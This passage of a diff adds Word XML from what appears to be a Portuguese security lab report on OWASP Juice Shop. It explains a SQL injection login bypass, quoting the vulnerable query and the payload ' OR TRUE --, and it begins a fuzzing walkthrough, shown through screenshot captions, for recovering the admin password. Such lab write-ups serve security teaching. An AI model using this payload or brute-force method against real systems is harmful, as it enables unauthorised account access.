+        <w:t>O ataque de SQL Injection explora uma falha no código onde o input do utilizador é inserido directamente numa query SQL sem tratamento. No formulário de login do código partilhado, a query vulnerável é construída assim: models.sequelize.query( SELECT * FROM Users WHERE email = '${req.body.email || ''}' AND password = '${security.hash(req.body.password || '')}' AND deletedAt IS NULL, { model: UserModel, plain: true } )</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Se num formulário se submeter a sequência ' OR TRUE -- no campo email, o req.body.email é interpolado na string e a instrução enviada ao SGBD fica equivalente a: SELECT * FROM Users WHERE email = '' OR TRUE -- ' AND password = 'hash(...)' AND deletedAt IS NULL O apóstrofo fecha o literal de string que existia na query original, OR TRUE transforma a condição do WHERE numa expressão que avalia sempre como verdadeira e o -- transforma o resto da linha num comentário, pelo que a verificação da password deixa de ser considerada. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:ind w:firstLine="720"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Com isso, a consulta passa a devolver várias (ou todas) as linhas da tabela Users. A aplicação, por usar { plain: true } e por processar o resultado de forma simplificada, acaba por autenticar o primeiro registo retornado; como frequentemente o primeiro registo corresponde ao administrador (por ordem de inserção ou por ordenação implícita), o atacante fica efetivamente autenticado com privilégios de administrador, sem conhecer a password.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Como descobrir a senha do </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">utilizador </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>administrador admin@juice-sh.op.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>A seleção de imagens seguintes, demonstra como a utilização de um ataque de fuzzing permite a descoberta de credencias:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5832149B" wp14:editId="2D6F144A">
+            <wp:extent cx="5148464" cy="2084070"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2094193084" name="Picture 2" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2094193084" name="Picture 2" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5150386" cy="2084848"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>10</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - Selecionamos o pedido que pertendemos fazer fuzzing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D5DB9AC" wp14:editId="02E8CBE2">
+            <wp:extent cx="3642995" cy="2758440"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:docPr id="456009411" name="Picture 3" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="456009411" name="Picture 3" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3646301" cy="2760943"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>11</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - Escolhemos o campo que pretendemos descobrir o valor (passwor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>d neste caso)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07AD30E6" wp14:editId="164EED55">
+                <wp:extent cx="304800" cy="304800"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="870240830" name="Rectangle 5"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr>
+                        <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="304800" cy="304800"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                        <a:extLst>
+                          <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
+                            <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+                              <a:solidFill>
+                                <a:srgbClr val="FFFFFF"/>
+                              </a:solidFill>
+                            </a14:hiddenFill>
+                          </a:ext>
+                          <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
+                            <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
+                              <a:solidFill>
+                                <a:srgbClr val="000000"/>
+                              </a:solidFill>
+                              <a:miter lim="800000"/>
+                              <a:headEnd/>
+                              <a:tailEnd/>
+                            </a14:hiddenLine>
+                          </a:ext>
+                        </a:extLst>
+                      </wps:spPr>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" upright="1">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:rect w14:anchorId="64517B7C" id="Rectangle 5" o:spid="_x0000_s1026" style="width:24pt;height:24pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                <o:lock v:ext="edit" aspectratio="t"/>
+                <w10:anchorlock/>
+              </v:rect>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="289B9C37" wp14:editId="11F2D864">
+                <wp:extent cx="304800" cy="304800"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="887336579" name="Rectangle 7"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr>
+                        <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="304800" cy="304800"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                        <a:extLst>
+                          <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
+                            <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+                              <a:solidFill>
+                                <a:srgbClr val="FFFFFF"/>
+                              </a:solidFill>
+                            </a14:hiddenFill>
+                          </a:ext>
+                          <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
+                            <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
+                              <a:solidFill>
+                                <a:srgbClr val="000000"/>
+                              </a:solidFill>
+                              <a:miter lim="800000"/>
+                              <a:headEnd/>
+                              <a:tailEnd/>
+                            </a14:hiddenLine>
+                          </a:ext>
+                        </a:extLst>
+                      </wps:spPr>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" upright="1">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:rect w14:anchorId="1FE6633C" id="Rectangle 7" o:spid="_x0000_s1026" style="width:24pt;height:24pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                <o:lock v:ext="edit" aspectratio="t"/>
+                <w10:anchorlock/>
+              </v:rect>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="626E4D62" wp14:editId="584C591F">
+            <wp:extent cx="5630545" cy="3375660"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
+            <wp:docPr id="165304535" name="Picture 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 2"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5638864" cy="3380647"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>12</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> - Adicionamos o payload</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17E37EB7" wp14:editId="22A8A751">
+                <wp:extent cx="304800" cy="304800"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="138795736" name="Rectangle 10"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr>
+                        <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="304800" cy="304800"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                        <a:extLst>
+                          <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
+                            <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+                              <a:solidFill>
+                                <a:srgbClr val="FFFFFF"/>
+                              </a:solidFill>
+                            </a14:hiddenFill>
+                          </a:ext>
+                          <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
+                            <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
+                              <a:solidFill>
+                                <a:srgbClr val="000000"/>
+                              </a:solidFill>
+                              <a:miter lim="800000"/>
+                              <a:headEnd/>
+                              <a:tailEnd/>
+                            </a14:hiddenLine>
+                          </a:ext>
+                        </a:extLst>
+                      </wps:spPr>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" upright="1">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:rect w14:anchorId="79D15FCB" id="Rectangle 10" o:spid="_x0000_s1026" style="width:24pt;height:24pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                <o:lock v:ext="edit" aspectratio="t"/>
+                <w10:anchorlock/>
+              </v:rect>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C536543" wp14:editId="78EC099A">
+            <wp:extent cx="3007360" cy="3495346"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="1009669992" name="Picture 11"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 3"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3009894" cy="3498291"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>13</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - Inserirmos os valores do payload (ficheiro txt com todos os valores possíveis)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
